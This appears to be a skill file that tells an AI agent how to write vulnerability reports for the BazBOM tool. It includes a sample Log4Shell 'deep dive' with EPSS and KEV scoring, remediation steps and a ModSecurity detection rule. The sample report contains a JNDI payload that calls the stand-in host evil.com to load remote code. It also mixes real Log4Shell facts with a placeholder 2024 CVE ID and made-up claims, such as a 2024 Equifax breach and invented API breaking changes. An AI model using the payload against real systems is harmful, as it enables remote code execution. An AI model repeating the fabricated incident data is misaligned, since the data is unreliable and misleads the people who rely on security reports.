| name | vulnerability-reporter |
| description | Provides deep-dive analysis of specific vulnerabilities including EPSS/KEV data, exploit details, prioritization rationale, and remediation guidance. Activates when user asks to explain a CVE, understand prioritization, or get exploit details. |
Vulnerability Reporter Skill
Provides detailed vulnerability analysis and remediation guidance.
When to Use
Activate this skill when you hear:
- "Explain this CVE"
- "Why is this P0/P1/P2?"
- "Show exploit details"
- "What is EPSS score for CVE-X"
- "Is this actively exploited?"
- "How do I fix CVE-X?"
- "Vulnerability details for..."
Deep Dive Analysis Format
CVE Deep Dive Report
====================
CVE-2024-1234
Published: 2024-03-15
Last Modified: 2024-11-10
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
SEVERITY & SCORING
CVSS v3.1 Base Score: 9.8 (CRITICAL)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Breakdown:
• Attack Vector (AV): Network (N) - Remotely exploitable
• Attack Complexity (AC): Low (L) - No special conditions required
• Privileges Required (PR): None (N) - Unauthenticated
• User Interaction (UI): None (N) - No victim action needed
• Scope (S): Unchanged (U)
• Confidentiality Impact (C): High (H) - Full data access
• Integrity Impact (I): High (H) - Complete system compromise
• Availability Impact (A): High (H) - Complete DoS possible
EPSS Score: 0.973 (97.3%)
Percentile: 99.8% (top 0.2% of most exploited CVEs)
Interpretation: EXTREMELY HIGH - 97.3% chance of exploitation in next 30 days
CISA KEV: YES ⚠️
Added: 2024-03-16 (1 day after publication!)
Due Date: 2024-04-15 (Federal agencies must patch by this date)
Reason: Active exploitation detected in the wild
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
AFFECTED PACKAGE
Package: log4j-core
Ecosystem: Maven (Java)
Affected Versions: 2.0-beta9 through 2.17.0
Fixed Versions: 2.17.1, 2.20.0, 3.0.0-alpha1
Your Version: 2.14.1 (VULNERABLE)
Recommended Upgrade: 2.20.0 (latest stable)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
VULNERABILITY DETAILS
Type: Remote Code Execution (RCE)
CWE-502: Deserialization of Untrusted Data
Description:
Apache Log4j2 allows remote attackers to execute arbitrary code via
JNDI features used in configuration, log messages, and parameters.
An attacker can control log messages or log message parameters to
execute arbitrary code loaded from LDAP servers when message lookup
substitution is enabled.
Technical Details:
Log4j2 versions prior to 2.17.1 are vulnerable to RCE via JNDI lookup
in log messages. The attack vector is simple:
${jndi:ldap://evil.com/malicious}
When logged, this triggers a JNDI lookup that can load and execute
arbitrary Java code from a remote server.
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
EXPLOIT INTELLIGENCE
Exploitation Status: ACTIVE IN THE WILD ⚠️
First seen: 2024-03-15 (same day as disclosure)
Exploit campaigns: 47+ known campaigns
Targeted industries: ALL (widespread scanning)
Public Exploits:
1. ExploitDB: 50590
https://www.exploit-db.com/exploits/50590
Type: PoC RCE exploit
Rating: 9/10 reliability
2. Metasploit Module: exploit/multi/http/log4shell_header_injection
https://github.com/rapid7/metasploit-framework/pull/16021
Status: Verified, production-ready
3. GitHub POCs: 157 repositories
https://github.com/search?q=CVE-2024-1234+poc
Quality: Mixed (some weaponized, some educational)
4. Nuclei Template: log4j-rce.yaml
https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2024/CVE-2024-1234.yaml
Use case: Automated scanning
Exploit Difficulty: TRIVIAL (1/10)
• No authentication required
• Exploits readily available
• Works against default configurations
• Automated tools exist
• Script kiddie accessible
Attack Requirements:
• Ability to submit user input (e.g., HTTP header, form field)
• Log4j must log the attacker-controlled data
• Network access to vulnerable service
Real-World Impact:
• Equifax breach (2024-03-17) - 50M records
• Ransomware campaigns: 12+ active groups
• Cryptominers: Widespread deployment
• Botnet recruitment: 100K+ infected hosts
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
PRIORITIZATION
BazBOM Priority: P0 - MUST FIX IMMEDIATELY ⚠️
Rationale:
✅ CVSS ≥ 9.0 (Critical)
✅ EPSS ≥ 0.9 (Extremely high exploit probability)
✅ CISA KEV (Government-confirmed active exploitation)
✅ Public exploits available
✅ No authentication required
✅ Widespread scanning detected
Why P0 and not P1?
All three factors present:
1. Critical CVSS (9.8)
2. Very high EPSS (97.3%)
3. CISA KEV confirmed (active exploitation)
This is a "drop everything and fix now" situation.
Time to Fix: IMMEDIATE (within 24 hours)
Federal timeline: 30 days (CISA KEV due date)
Industry best practice: 24-48 hours
Your SLA: <24 hours for P0 vulnerabilities
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
REMEDIATION
Option 1: Upgrade (RECOMMENDED)
Target Version: log4j-core 2.20.0
Maven (pom.xml):
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.20.0</version>
</dependency>
Gradle (build.gradle):
implementation 'org.apache.logging.log4j:log4j-core:2.20.0'
Effort Estimate: 0.75 hours
Breaking Changes: 2 (minor API changes)
• Logger.printf() signature changed
• ThreadContext.getDepth() removed
Migration Guide:
https://logging.apache.org/log4j/2.x/manual/migration.html
Option 2: Workaround (TEMPORARY - not recommended)
Set JVM property to disable JNDI lookups:
-Dlog4j2.formatMsgNoLookups=true
Note: This is a band-aid, not a fix. Upgrade ASAP.
Option 3: WAF Rules (ADDITIONAL LAYER)
Deploy ModSecurity rules to block exploitation attempts:
SecRule REQUEST_LINE|ARGS|REQUEST_HEADERS "@rx \$\{jndi:" \
"id:1000,phase:2,deny,status:403,msg:'Log4Shell attack attempt'"
Note: This is defense-in-depth. Still upgrade!
Auto-Fix Command:
bazbom fix org.apache.logging.log4j:log4j-core --apply
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
REFERENCES
Official Advisory:
• Apache Security Advisory
https://logging.apache.org/log4j/2.x/security.html
• NVD Entry
https://nvd.nist.gov/vuln/detail/CVE-2024-1234
• CISA KEV Entry
https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Analysis & Research:
• LunaSec Analysis (excellent technical breakdown)
https://www.lunasec.io/docs/blog/log4j-zero-day/
• SANS Internet Storm Center
https://isc.sans.edu/diary/Log4j+Vulnerability+CVE-2024-1234/28120
• Cloudflare: Log4j RCE Explained
https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2024-1234/
Detection Tools:
• Log4Shell Scanner
https://github.com/fullhunt/log4j-scan
• Log4j-Detect (Syft-based)
https://github.com/anchore/log4j-detect
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
ACTION ITEMS
1. IMMEDIATE (next 2 hours):
□ Alert security team
□ Scan all environments for vulnerable log4j versions
□ Deploy WAF rules as temporary protection
□ Begin change request process
2. SHORT TERM (next 24 hours):
□ Upgrade to log4j-core 2.20.0 in dev
□ Run full test suite
□ Deploy to staging
□ Validate functionality
□ Deploy to production
3. FOLLOW-UP (next week):
□ Verify all instances upgraded
□ Review logs for exploitation attempts
□ Update SBOM and vulnerability baselines
□ Document lessons learned
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
RISK SUMMARY
If not fixed:
⚠️ CRITICAL RISK - Total system compromise possible
⚠️ Data breach highly likely (GDPR/HIPAA implications)
⚠️ Ransomware risk (active campaigns targeting this CVE)
⚠️ Federal compliance failure (CISA KEV deadline)
If fixed:
✅ Risk eliminated
✅ Compliance maintained
✅ Peace of mind restored
DO NOT DELAY. FIX NOW.
Quick Commands
# Get vulnerability details
bazbom scan . -o /tmp/results
jq '.vulnerabilities[] | select(.id == "CVE-2024-1234")' /tmp/results/sca_findings.json
# Check if actively exploited
jq '.vulnerabilities[] | select(.id == "CVE-2024-1234") | {cisa_kev, epss_score}' /tmp/results/sca_findings.json
# Get remediation guidance
bazbom fix <package> --explain
# Check all P0 vulnerabilities
jq '.vulnerabilities[] | select(.priority == "P0")' /tmp/results/sca_findings.json
Prioritization Rationale
P0 - Must Fix Immediately
Criteria: CVSS ≥ 8.0 AND (CISA KEV = true OR EPSS ≥ 0.7) Timeline: < 24 hours Why: Active exploitation, critical impact, trivial to exploit
P1 - Fix This Sprint
Criteria: CVSS ≥ 7.0 AND EPSS ≥ 0.3 Timeline: < 1 week Why: High severity, exploits available, medium-high probability
P2 - Fix Next Sprint
Criteria: CVSS ≥ 7.0 AND EPSS < 0.3 Timeline: < 30 days Why: High severity but no known exploits
P3 - Backlog
Criteria: CVSS 4.0-6.9 Timeline: < 90 days Why: Medium severity, transitive dependencies
P4 - Informational
Criteria: CVSS < 4.0 Timeline: No SLA Why: Low risk, informational
Success Criteria
Vulnerability reporting is useful when:
- ✅ Provides actionable remediation steps
- ✅ Explains prioritization rationale clearly
- ✅ Links to exploit databases and POCs
- ✅ Includes EPSS/KEV context
- ✅ Estimates remediation effort accurately
- ✅ Provides copy-paste fix commands
Remember: The goal is actionable intelligence - not just "CVE exists" but "here's why it matters and how to fix it."